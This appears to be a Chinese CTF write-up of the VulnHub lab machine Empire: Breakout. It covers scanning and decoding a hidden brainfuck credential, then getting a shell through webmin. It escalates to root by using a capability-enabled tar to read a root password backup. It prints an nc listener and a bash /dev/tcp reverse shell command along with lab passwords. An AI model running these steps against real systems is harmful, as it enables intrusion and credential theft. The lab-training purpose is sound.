[渗透测试学习靶机02] vulnhub靶场 Empire: Breakout
kali IP地址为192.168.127.139
靶机 IP地址为192.168.127.141
目录
一、信息搜集
1.1、扫描主机口
1.2、端口扫描
1.3、目录扫描
2、枚举漏洞
2.1、枚举信息
2.2、端口分析
3、漏洞利用
3.1、利用webadmin漏洞
4、权限提升
4.1、寻找suid权限程序提权
4.2、寻找Capabilities(功能)程序
4.3、信息收集获取root密码
4.4、利用webadmin后台反弹shell提权
一、信息搜集
1.1、扫描主机口
1.2、端口扫描
探测主机开放的端口服务,我们发现开放了 80 445 10000 20000等端口
1.3、目录扫描
目录扫描,发现没有什么
查看nmap扫出的端口相关URL,发现只有10000、20000端口是一个登录页面,猜测应该会有Webadmin的漏洞
2、枚举漏洞
挖掘思路——根据端口开放情况查找对应服务的漏洞
2.1、枚举信息
文件共享服务可以使用 enum4linux来枚举信息
如上图,发现得到用户名:cyber
2.2、端口分析
紧接着我们进行端口分析,访问80端口:是一个apache默认页面,我们发现没有什么东西,可以
查看网页源码,发现一串秘文,找到突破口
192.168.127.141:80
很明显是 brainfuck 加密的数据,搜索对应在线解密网站,得到一串数字,百度找了在线解密,没有合适的,这里我用的网站是
CTF|CTF宸ュ叿涓嬭浇|CTF宸ュ叿鍖厊CTF鏁欑▼
https://tool.bugku.com/<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.-->
用户名: cyter 密码:.2uqPEfj3D<P'a-3
用户名: cyter 密码:.2uqPEfj3D<P'a-3尝试去登陆 webadmin
发现10000端口没成功,20000端口成功登录
3、漏洞利用
3.1、利用webadmin漏洞
在这里找到了一个command shell(如下图标红的框的地方),发现能登陆后台,在网页上打开控制台,打开得到第一个flag
4、权限提升
4.1、寻找suid权限程序提权
在shell 中寻找 suid 程序:find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
没有发现(在 https://gtfobins.github.io/对比)
4.2、寻找Capabilities(功能)程序
在用户目录下查看文件可以发现一个二进制文件tar
在CTF 中每当看到二进制文件的副本时
都应该检查一下其 Capabilities(功能)和 suid 程序。
查询当前目录下 tar 文件的功能:getcap tar
还可以加参数-r 递归查询: getcap -r / 2>/dev/null,发现了2个文件
可以尝试查找一些敏感文件,使用tar读取
4.3、信息收集获取root密码
使用以下命令查询有pass关键字的文件
find / -name '*pass*' 2</dev/null
find / -name '*pass*' 2</dev/null
可以发现有一个备份文件是 root 用户以及组的,尝试使用 tar 压缩
./tar -cf bak.tar /var/backups/.old_pass.bak
tar -xf bak.tar
cat var/backups/.old_pass.bak
./tar -cf bak.tar /var/backups/.old_pass.bak
tar -xf bak.tar
cat var/backups/.old_pass.bak
获取密码:Ts&4&YurgtRX(=~h
Ts&4&YurgtRX(=~h4.4、利用webadmin后台反弹shell提权
在kali中开启监听:nc -lvp 6666
nc -lvp 6666
在 webadmin 后台,执行以下命令
bash -c 'bash -i >& /dev/tcp/192.168.127.139/6666 0>&1
bash -c 'bash -i >& /dev/tcp/192.168.127.139/6666 0>&1'
切换root用户,输入密码
权限提升成功,完结!!!
总结:
整体来说该靶机难度比较简单,前面的信息搜集完了之后,可以先从webmin入手,想到两个CVE,一个不需要登录,验证不存在,另一个需要登录,又先放下,去挖80端。从80端口的源码中发现一个brainfuck加密的数据,解密后得到了一个密码。又去看samba服务,收集到一个cyber用户,以此为账号密码登录webmin 成功,另一个CVE也验证失败,最后从web后台界面找到一个 可以执行 command shell 的地方 反弹shell成功。
提权 依靠 cyber用户下 存在一个 具有可执行的root权限的 tar命令,又找到一个root的密码备份文件,以发现的tar命令压缩备份文件(.tar),又以当前用户的tar命令解压(tar)出该文件,权限就变为cyber用户的权限,读取到密码,su root 提权成功。
[渗透测试学习靶机02] vulnhub靶场 Empire: Breakout相关推荐
- [渗透测试学习靶机03] vulnhub靶场 Empire LupinOne
Kali 的IP地址:192.168.127.139 靶机的IP地址:192.168.127.142 目录 一.信息搜集 1.1.扫描主机口 1.2.扫描端口 二.Web漏洞利用 2.1.目录遍历 2 ...
- [渗透测试学习靶机05] vulnhub靶场 DarkHole: 2
kali IP地址为192.168.127.139 靶机 IP地址为192.168.127.144 目录 一.信息搜集 1.1.扫描主机口 1.2. 扫描端口 1.3.访问端口 1.4.扫描目录 二. ...
- 渗透测试学习之靶机DC-2
1.下载靶机 本篇文章是DC靶机系列的第二个篇,针对DC-2,建议感兴趣的读者从DC-1开始练习((26条消息) 渗透测试学习之靶机DC-1_xdbzdgx的博客-CSDN博客). DC-2的下载地址 ...
- KALI LINUX渗透测试学习笔记
KALI LINUX渗透测试学习笔记 (苑房弘主讲) 第1章 课程介绍 任务1:Kali Linux渗透测试介绍.exe 安全问题的根源: 分层思想 只求功能实现 最大的威胁是人 渗透测试: 尝试挫败 ...
- Web渗透测试对靶机注入shell(phpMyAdmin)
Web渗透测试对靶机注入shell 文章目录 Web渗透测试对靶机注入shell 1.寻找目标信息 netdiscover扫描 nmap扫描 利用御剑后台进行扫描 2.对登录页面进行暴力破解 启动bu ...
- 渗透测试学习总体概括
渗透测试学习总体概括 一.相关内容 1.编程语言基础知识语法的一个掌握,对于编程的本身来讲没有区别.2.把一个想法变成一个工具或者功能.3.安全工程师的软件工程能力较弱,也不影响安全的能力.java的 ...
- 渗透测试学习笔记之案例二
0x00 前言 渗透是个持续的过程,不断地搜集信息,整理信息,以及利用信息,最终的目标就是拿到系统乃至整个网络的最高权限.在笔者看来,渗透测试与安全研究的最大不同就是前者擅长利用后者的研究成果并运用到 ...
- Android 渗透测试学习手册 翻译完成!
Android 渗透测试学习手册 中文版 原书:Learning Pentesting for Android Devices 译者:飞龙 在线阅读 PDF格式 EPUB格式 MOBI格式 代码仓库 ...
- web渗透测试学习路径图
Web渗透测试学习路线 一.基础知识 1.1 网络协议 <图解http> 1.2 编程语言 python 30 days for python go 1.3 Linux/Bash Over ...
最新文章
- git解决pre-commit hook failed的问题
- 人脸识别大规模爆发!
- sql注入及mybatis防止sql注入
- 你我他科技php面试题,北京科大”携手你我他”, “励”行爱加艾減公益
- python多分类混淆矩阵代码_深度学习自学记录(3)——两种多分类混淆矩阵的Python实现(含代码)...
- 【计算机算法设计与分析】——5.4最优二分检索树
- 智慧城市特效(建筑颜色渐变、飞线、扫光、扫描、光墙、线路、水、道路线条、锥形标、漫游)three+shader
- linux socket版本 can,linux socket can程序cantool
- Android MQTT客户端
- 轻轻的,我来了!希望各大神关注~
- ANDROID ROOT FIDDLER HTTPS 抓包
- linux 批量删除任务,Linux-Shell脚本学习心得之批量创建、删除用户
- 阿里天池街景字符编码YOLO5方案
- 从零编写一个解析器(1)—— 解析数字
- Win32 API 函数列表
- 常常反思,让你变成更好的自己
- java for二重循环_java什么是二重循环
- 并发编程指南(二)Dispatch Queue
- 重启之后docker不能用了:Docker Error starting daemon: Devices cgroup isn‘t mounted;Got permission denied whil
- Windows server 2022安装与激活